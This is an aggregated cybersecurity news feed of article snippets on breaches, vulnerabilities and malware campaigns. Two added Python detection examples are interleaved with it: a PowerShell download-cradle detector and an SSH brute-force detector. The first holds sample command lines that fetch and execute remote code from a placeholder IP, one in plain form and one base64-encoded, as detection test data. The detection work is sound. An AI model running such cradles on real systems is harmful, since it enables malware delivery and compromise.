Category: Attack Feeds

Microsoft’s security culture reboot includes cyber governance council, all-staff trainings – Christian Vasquez

– The tech giant with the figurative and often literal keys to everyone’s kingdom released a progress report Monday on the cyber overhaul it has undertaken following a spree of major security failures. Microsoft — which is branding the effort as a “Secure Future Initiative” — first launched the cultural shift in November 2023 amid increasing criticism for multiple...

Why ‘Never Expire’ Passwords Can Be a Risky Decision – [email protected] (The Hacker News)

– Password resets can be frustrating for end users. Nobody likes being interrupted by the ‘time to change your password’ notification – and they like it even less when the new passwords they create are rejected by their organization’s password policy. IT teams share the pain, with resetting passwords via service desk tickets and support calls being an everyday burden....

THN Cybersecurity Recap: Last Week’s Top Threats and Trends (September 16-22) – [email protected] (The Hacker News)

– Hold on tight, folks, because last week’s cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling “dream jobs” to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let’s dive into the details...

Discord Introduces DAVE Protocol for End-to-End Encryption in Audio and Video Calls – [email protected] (The Hacker News)

– Popular social messaging platform Discord has announced that it’s rolling out a new custom end-to-end encrypted (E2EE) protocol to secure audio and video calls. The protocol has been dubbed DAVE, short for Discord’s audio and video end-to-end encryption (“E2EE A/V”). As part of the change introduced last week, voice and video in DMs, Group DMs, voice channels, and Go...

Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk – [email protected] (The Hacker News)

– A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution. The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF’s implementation of the tinydhcp server stemming from...

Quantum Computing and Cybersecurity – Preparing for a New Age of Threats – [email protected]

– The content of this post is solely the responsibility of the author. LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article. Quantum computing is no longer just a distant technological breakthrough confined to research labs. It is quickly becoming a reality that will transform the digital landscape...

New PondRAT Malware Hidden in Python Packages Targets Software Developers – [email protected] (The Hacker News)

– Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign. PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been...

Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware – [email protected] (The Hacker News)

– A suspected advanced persistent threat (APT) originating from China targeted a government organization in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw impacting OSGeo GeoServer GeoTools. The intrusion activity, which was detected by Trend Micro in July 2024, has been attributed to a threat actor dubbed Earth Baxia.

Hacker behind Snowflake customer data breaches remains active – Greg Otto

– SCOTTSDALE, Ariz. — The hacker behind the bulk of the Snowflake customer data theft earlier this year remains active as of this week, a researcher tracking the suspect said Friday. The hacker — known primarily as “Judische,” but who also used other names online, including “Waifu” — continues to target software-as-a-service providers and other entities “as recently as today,” Austin Larsen, a...

Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks – [email protected] (The Hacker News)

– A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets. “Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery,” Kaspersky said in a Friday analysis. “The approach is indicative...

Ukraine Bans Telegram Use for Government and Military Personnel – [email protected] (The Hacker News)

– Ukraine has restricted the use of the Telegram messaging app by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns. The ban was announced by the National Coordination Centre for Cybersecurity (NCCC) in a post shared on Facebook. “I have always advocated and advocate for freedom of speech, but the issue of Telegram...

LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO – [email protected] (The Hacker News)

– The U.K. Information Commissioner’s Office (ICO) has confirmed that professional social networking platform LinkedIn has suspended processing users’ data in the country to train its artificial intelligence (AI) models. “We are pleased that LinkedIn has reflected on the concerns we raised about its approach to training generative AI models with information relating to its U.K. users,” Stephen...

OIG audit calls for more clarity from CISA, DHS on disinformation mission  – djohnson

– A federal audit released this week gives the Cybersecurity and Infrastructure Security Agency generally high marks for its work protecting election infrastructure from cyber and physical threats, coordinating with other federal agencies and supporting state and local officials. But it also provided further evidence that the agency is playing a reduced role around disinformation this election cycle, citing...

Here’s what corporate boards are asking Kevin Mandia about – Greg Otto

– DENVER — Hey, CISOs: You have the C-Suite’s attention. Given the frequency of attacks and the cost associated with recovery, Kevin Mandia, founder of Mandiant and strategic adviser at Google Cloud, says executives have now recognized the crucial need to integrate robust security measures with core business strategies to protect assets and maintain normal operations. “Boards and executives...

Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials – [email protected] (The Hacker News)

– Law enforcement authorities have announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones. The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina...

Passwordless AND Keyless: The Future of (Privileged) Access Management – [email protected] (The Hacker News)

– In IT environments, some secrets are managed well and some fly under the radar. Here’s a quick checklist of what kinds of secrets companies typically manage, including one type they should manage: Passwords [x], TLS certificates [x], Accounts [x], SSH keys ??? The secrets listed above are typically secured with privileged access management (PAM) solutions or similar. Yet, most...

Iranian APT UNC1860 Linked to MOIS Facilitates Cyber Intrusions in Middle East – [email protected] (The Hacker News)

– An Iranian advanced persistent threat (APT) threat actor likely affiliated with the Ministry of Intelligence and Security (MOIS) is now acting as an initial access facilitator that provides remote access to target networks. Google-owned Mandiant is tracking the activity cluster under the moniker UNC1860, which it said shares similarities with intrusion sets tracked by Microsoft, Cisco Talos, and...

Chrome Users Can Now Sync Passkeys Across Devices with New Google PIN Feature – [email protected] (The Hacker News)

– Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices. “This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can’t be accessed by anyone, not even Google,” Chrome product manager Chirag Desai said. The PIN is a six-digit...

Critical Ivanti Cloud Appliance Vulnerability Exploited in Active Cyberattacks – [email protected] (The Hacker News)

– Ivanti has revealed that a critical security flaw impacting Cloud Service Appliance (CSA) has come under active exploitation in the wild. The new vulnerability, assigned the CVE identifier CVE-2024-8963, carries a CVSS score of 9.4 out of a maximum of 10.0. It was “incidentally addressed” by the company as part of CSA 4.6 Patch 519 and CSA 5.0. “Path...

European, Latin American authorities arrest 17 in crackdown on phishing network with 483,000 victims – Tim Starks

– European and Latin American law enforcement arrested 17 suspects in a bust aimed at a criminal phishing network that has claimed nearly half a million victims, Europol said Thursday. Among those arrested were the Argentinian administrator of the phishing platform, through which the alleged criminals engaged in unlocking lost or stolen mobile phones, the European police organization said....

UnitedHealth Group CISO: We had to ‘start over’ after Change Healthcare attack – Greg Otto

– DENVER — UnitedHealth Group is still in the recovery process months after a ransomware attack on its Change Healthcare subsidiary, with its chief information security officer saying the company has essentially “started over” with regard to its computer systems. “When I say start over, I really, truly mean start over,” Steven Martin said Thursday at the Mandiant Worldwide...

This Windows PowerShell Phish Has Scary Potential – BrianKrebs

– Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it’s unlikely that many programmers fell for this scam, it’s...
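The Krebs item above describes a phish whose payoff is a keyboard sequence that makes Windows fetch and run malware, which in practice means a PowerShell download cradle started from the user's desktop shell. The block below is an added example, not code from the article: it scores constructed process-creation records (field names borrowed from Sysmon Event ID 1, which is an assumption about the telemetry available) for PowerShell launched by explorer.exe with cradle indicators, decoding any -EncodedCommand payload before matching. The indicator list, the threshold of 2, the IP 198.51.100.23 and the sample records are all illustrative assumptions.

```python
"""Score process-creation records for the PowerShell download-cradle pattern.

Added example, not from the article. Records are constructed dicts whose field
names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1; indicators,
threshold and sample data are assumptions made for this illustration.
"""
import base64
import re

# (name, regex) pairs matched case-insensitively against the lower-cased command
# line plus the decoded -EncodedCommand payload (indicator set is an assumption)
CRADLE_INDICATORS = [
    ("invoke-webrequest", r"invoke-webrequest"),
    ("iwr", r"\biwr\b"),
    ("curl", r"\bcurl\b"),
    ("downloadstring", r"downloadstring"),
    ("downloadfile", r"downloadfile"),
    ("net.webclient", r"net\.webclient"),
    ("iex", r"\biex\b"),
    ("invoke-expression", r"invoke-expression"),
    ("start-bitstransfer", r"start-bitstransfer"),
    ("frombase64string", r"frombase64string"),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
    ("nop", r"-nop\b|-noprofile"),
]
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64(UTF-16LE) script
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
POWERSHELL = ("powershell.exe", "pwsh.exe")
THRESHOLD = 2  # assumed: one cradle indicator plus an odd parent is enough to alert


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or '' if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_record(rec):
    """Return (score, hits) for one record; score >= THRESHOLD is suspicious."""
    image = rec.get("Image", "").lower().rsplit("\\", 1)[-1]
    if image not in POWERSHELL:
        return 0, []
    cmd = rec.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    # scan the plain command line with the base64 blob removed, plus its decoding,
    # so that random base64 characters cannot produce false matches
    text = (ENCODED_FLAG.sub(" ", cmd) + " " + decoded).lower()
    hits = [name for name, pat in CRADLE_INDICATORS if re.search(pat, text)]
    if decoded:
        hits.append("encodedcommand")
    parent = rec.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    # a shell started straight from explorer.exe (Run dialog, double-click) is the
    # parent this phish produces; script hosts and admin tools are normal parents
    if parent == "explorer.exe":
        hits.append("parent:explorer.exe")
    return len(hits), hits


def find_suspicious(records, threshold=THRESHOLD):
    """Return [(RecordId, score, hits)] for records at or above threshold, in order."""
    out = []
    for rec in records:
        score, hits = score_record(rec)
        if score >= threshold:
            out.append((rec["RecordId"], score, hits))
    return out


# Constructed sample telemetry (not real events). Record 3 carries a cradle hidden
# behind -EncodedCommand; the payload is built here so it round-trips exactly.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/p')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -c "iwr http://198.51.100.23/x.txt | iex"'},
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + _ENCODED},
    {"RecordId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
]

if __name__ == "__main__":
    for record_id, score, hits in find_suspicious(SAMPLE_RECORDS):
        print(f"record {record_id}: score {score}, hits {hits}")
```

Record 4 (a user simply opening a console from the desktop) scores 1 and stays below the threshold, while records 2 and 3 score 5 each; the scanned text deliberately excludes the raw base64 so the decoded script, not the blob, is what matches.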

Krebs: Iranian outreach to Biden campaign was ‘late breaking’ news to U.S. gov – AJ Vicens

– SCOTTSDALE, Ariz. — U.S. authorities have only recently become aware that the Iranians working as part of a hack-and-leak operation targeting President Donald Trump’s campaign attempted to share excerpts of stolen material with people associated with President Joe Biden’s campaign, a former top U.S. cybersecurity official said Thursday. Chris Krebs, the former director of the Cybersecurity and Infrastructure Security...

Wherever There’s Ransomware, There’s Service Account Compromise. Are You Protected? – [email protected] (The Hacker News)

– Until just a couple of years ago, only a handful of IAM pros knew what service accounts are. In recent years, these silent non-human identity (NHI) accounts have become one of the most targeted and compromised attack surfaces. Assessments report that compromised service accounts play a key role in lateral movement in over 70% of ransomware attacks. However, there’s...

FTC details how streaming services, social media have become ‘mass surveillance’ machines  – djohnson

– A Federal Trade Commission inquiry found that popular social media and video streaming services engaged in “mass data collection” of their users, as well as some non-users, while also failing to implement privacy safeguards for children and teens. The findings, contained in a report that has been unanimously endorsed by the agency’s commissioners, provide fresh insights into online...

Exploiting Exchange PowerShell After ProxyNotShell: Part 3 – DLL Loading Chain for RCE – Piotr Bazydło

– As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of 4 blog posts is meant to supplement the talk and provide additional technical details. In this article, part 3 of the series, I describe a chain of 3 vulnerabilities that led to remote code execution: CVE-2023-36744 – Arbitrary File Write vulnerability; ...

Hackers Exploit Default Credentials in FOUNDATION Software to Breach Construction Firms – [email protected] (The Hacker News)

– Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress. “Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials,” the cybersecurity company said. Targets of the emerging threat include plumbing, HVAC (heating, ...

New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit – [email protected] (The Hacker News)

– The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system. “The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim’s assets, during which the threat actor uploaded a malicious script,” Group-IB researchers Vito Alfano and Nam...
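Both the TeamTNT item above (SSH brute force as initial access on CentOS VPS hosts) and the FOUNDATION item before it (credentials brute-forced at scale) come down to the same detection question: which source kept failing authentication and then got in? The block below is an added example, not code from Group-IB or Huntress. It parses sshd lines in the default CentOS /var/log/secure format, keeps a sliding window of failures per source address, and reports sources that crossed a failure threshold and then had a login accepted. The log lines, addresses, the five-failure threshold and the 300-second window are constructed assumptions for the illustration.

```python
"""Flag SSH brute force followed by a successful login in sshd log lines.

Added example, not from the Group-IB report. SAMPLE_LOG is constructed in the
rsyslog format CentOS writes to /var/log/secure; addresses, user names,
threshold and window are assumptions chosen for this illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines
# that sshd logs for each authentication attempt.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

# Constructed sample: one source hammers root, then gets in; the rest is noise.
SAMPLE_LOG = """\
Sep 20 03:14:01 vps1 sshd[2001]: Failed password for root from 203.0.113.7 port 51022 ssh2
Sep 20 03:14:03 vps1 sshd[2002]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Sep 20 03:14:05 vps1 sshd[2003]: Failed password for root from 203.0.113.7 port 51041 ssh2
Sep 20 03:14:08 vps1 sshd[2004]: Failed password for root from 203.0.113.7 port 51055 ssh2
Sep 20 03:14:10 vps1 sshd[2005]: Failed password for root from 203.0.113.7 port 51060 ssh2
Sep 20 03:14:12 vps1 sshd[2006]: Accepted password for root from 203.0.113.7 port 51071 ssh2
Sep 20 03:20:00 vps1 sshd[2100]: Accepted publickey for deploy from 198.51.100.4 port 40010 ssh2
Sep 20 03:21:00 vps1 sshd[2101]: Failed password for deploy from 198.51.100.9 port 40020 ssh2
"""


def parse_events(text):
    """Yield (timestamp, result, user, ip) for every sshd auth line that matches."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog timestamps carry no year; strptime defaults to 1900, which is
            # fine because only differences between timestamps are used below
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]


def detect_brute_force(text, threshold=5, window_seconds=300):
    """Return {ip: {"failures": n, "compromised_users": [...]}}.

    A source is listed once it reaches `threshold` failures inside a sliding
    window of `window_seconds`; `compromised_users` records accounts that were
    then accepted from that source while the window was still above threshold.
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    findings = {}
    for ts, result, user, ip in parse_events(text):
        window = recent[ip]
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if result == "Failed":
            window.append(ts)
            if len(window) >= threshold:
                entry = findings.setdefault(ip, {"failures": 0, "compromised_users": []})
                entry["failures"] = max(entry["failures"], len(window))
        elif ip in findings and len(window) >= threshold:
            users = findings[ip]["compromised_users"]
            if user not in users:
                users.append(user)
    return findings


if __name__ == "__main__":
    for ip, info in detect_brute_force(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failures, then accepted for {info['compromised_users']}")
```

Feeding the real file is a matter of `detect_brute_force(open("/var/log/secure").read())`; a non-empty `compromised_users` list is the case worth paging on, since a source that only fails is the background noise every internet-facing VPS sees.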

What more can be done to stop ransomware attacks?  – Greg Otto

– DENVER — “Drone strikes.” The comment, made somewhat in jest by Allan Liska, an intelligence analyst at Recorded Future, was in response to a question about what could be done to further deter ransomware actors from carrying out their attacks. “We only need to hit one ransomware dude with a drone, and then a whole bunch of them...

New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails – [email protected] (The Hacker News)

– A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor. “Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country,” Kaspersky said in a new analysis. “It’s likely that the attackers are testing...

Healthcare’s Diagnosis is Critical: The Cure is Cybersecurity Hygiene – [email protected] (The Hacker News)

– Cybersecurity in healthcare has never been more urgent. As the most vulnerable industry and largest target for cybercriminals, healthcare is facing an increasing wave of cyberattacks. When a hospital’s systems are held hostage by ransomware, it’s not just data at risk — it’s the care of patients who depend on life-saving treatments. Imagine an attack that forces emergency care...

Despite challenges, Minnesota’s top election official is ‘an optimist’ heading into November – djohnson

– Steve Simon has served as Minnesota’s 22nd Secretary of State since 2015, overseeing elections across 87 counties and managing the state’s voter registration database. His tenure has spanned three presidential election cycles, including in 2016, when the Russian government waged a covert campaign to interfere with U.S. election infrastructure, and in 2020, when false claims of election fraud...

Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector – [email protected] (The Hacker News)

– Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S. The tech giant’s threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832). “Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,...

GitLab Patches Critical SAML Authentication Bypass Flaw in CE and EE Editions – [email protected] (The Hacker News)

– GitLab has released patches to address a critical flaw impacting Community Edition (CE) and Enterprise Edition (EE) that could result in an authentication bypass. The vulnerability is rooted in the ruby-saml library (CVE-2024-45409, CVSS score: 10.0), which could allow an attacker to log in as an arbitrary user within the vulnerable system. It was addressed by the maintainers last...

U.S. agencies say Iranian hackers tried to pass ‘non-public’ Trump campaign docs to Biden’s campaign – mbracken

– Federal law enforcement and national security authorities said Wednesday that Iranian hackers sent unsolicited emails containing “non-public” information from the Trump campaign to individuals associated with the Biden campaign. The Cybersecurity and Infrastructure Security Agency, the FBI and the Office of the Director of National Intelligence said the emails, sent in late June and early July before President...

Smashing Security podcast #385: TFL security derailed, and is Trump the king of crypto? – Graham Cluley

– Transport for London (TfL) suffers a cybersecurity incident and tells its 30,000 staff they will all have to have their identities verified… in person. Who might have been behind the attack and why? Meanwhile, Donald Trump’s curious relationship with cryptocurrency is explored. All this and Demi Moore is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans...

New “Raptor Train” IoT Botnet Compromises Over 200,000 Devices Worldwide – [email protected] (The Hacker News)

– Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett). The sophisticated botnet, dubbed Raptor Train by Lumen’s Black Lotus Labs, is believed to have been operational since at least May 2020,...